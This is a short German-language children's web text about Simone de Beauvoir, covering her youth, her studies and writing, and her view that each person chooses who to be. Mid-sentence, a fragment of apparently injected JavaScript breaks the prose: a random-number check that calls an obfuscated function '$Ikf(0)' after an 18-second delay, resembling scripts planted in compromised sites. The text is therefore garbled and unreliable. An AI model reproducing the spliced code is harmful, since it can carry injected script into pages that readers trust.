Hannah Arendt war eine von zwei ganz berühmten Philosophinnen. Die zweite nannte sich Simone DE BEAUVOIR.

Als Simone ein junges Mädchen war, war sie oft traurig. Sie bemerkte, dass sie viel konnte, doch wollte nicht tun, was sich andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere für sie vorstellten.

Damals war es üblich, sich als Frau um nichts als die Familie zu kümmern und immer nett und gehorsam zu sein. Simone wollte sich nicht anpassen. Sie  fing an zu studieren und Bücher zu schreiben. Sie arbeitete beim Radio und war auch Philosophielehrerin.

In einem ihrer Bücher wies sie darauf hin, dass die Männer nur eine bestimmte Vorstellung von den Frauen haben.

Jeder Mensch, ob Mann oder Frau, kann sich jedoch selbst entscheiden, wie er oder sie sein will!

Lies weiter bei: Gibt es Pippi Langstrumpf in Wirklichkeit?

Comments are closed.